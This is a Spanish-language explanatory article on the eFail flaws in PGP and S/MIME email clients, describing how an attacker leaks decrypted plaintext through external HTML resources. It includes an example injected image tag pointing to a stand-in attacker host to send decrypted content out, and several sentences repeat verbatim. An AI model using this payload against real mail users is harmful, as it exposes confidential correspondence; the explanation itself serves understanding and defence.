PGP y S/MIME son estándares
populares de encriptación de extremo a extremo utilizados para encriptar
correos electrónicos de una manera que nadie, ni siquiera la compañía, el
gobierno o los ciberdelincuentes, pueden espiar su comunicación.
Debemos tener en cuenta que la falla no reside en los estándares de cifrado del correo electrónico.
Debemos tener en cuenta que la falla no reside en los estándares de cifrado del correo electrónico.
Apodados eFail por los
investigadores, las vulnerabilidades, podrían permitir que los atacantes
descifren el contenido de sus correos electrónicos cifrados de extremo a extremo
en texto sin formato, incluso para los mensajes enviados en el pasado.
las vulnerabilidades existen en la forma en que los clientes de correo cifrado manejan correos electrónicos HTML y recursos externos, como la carga de imágenes, estilos de URL externas.
las vulnerabilidades existen en la forma en que los clientes de correo cifrado manejan correos electrónicos HTML y recursos externos, como la carga de imágenes, estilos de URL externas.
Los clientes de correo
electrónico suelen estar configurados para descifrar automáticamente el
contenido de los correos electrónicos cifrados que usted recibe, pero si su
cliente también está configurado para cargar recursos externos automáticamente,
los atacantes pueden abusar de este comportamiento para robar mensajes en texto
simple.
El vector de ataque requiere
texto plano inyectado en el correo encriptado, y luego usando el exploit, se
filtrarán los datos originalmente encriptados tan pronto como el cliente de
correo del destinatario acceda (o descifre) el mensaje.
Cabe señalar que para realizar un ataque de eFail, un atacante debe tener acceso a sus correos electrónicos encriptados, que luego se modifican y se envían de vuelta para engañar a su cliente de correo electrónico y revelarle el mensaje secreto al atacante remoto. sin avisarte.
En el correo electrónico
recientemente compuesto, el atacante agrega una etiqueta de imagen no cerrada,
como esta "imgsrc= "https ://attackersite.com/ justo antes del contenido
encriptado y lo finaliza a gregando el final de la etiqueta de imagen, como
este: “jpg ".Cabe señalar que para realizar un ataque de eFail, un atacante debe tener acceso a sus correos electrónicos encriptados, que luego se modifican y se envían de vuelta para engañar a su cliente de correo electrónico y revelarle el mensaje secreto al atacante remoto. sin avisarte.
Cuando su cliente de correo electrónico vulnerable recibe este mensaje, descifra la parte encriptada del mensaje dado en el medio, y luego automáticamente intenta mostrar el contenido HTML, es decir, la etiqueta de la imagen con todo el texto descifrado como el nuevo nombre de la imagen
Como su cliente de correo
electrónico intentará cargar la imagen desde el servidor controlado por el
atacante, el atacante puede capturar esta solicitud entrante, donde el nombre
de archivo contiene el contenido completo del correo electrónico encriptado
original en texto sin formato.
Los investigadores también aconsejan a los usuarios que adopten un algoritmo de
cifrado autenticado para la comunicación confidencial.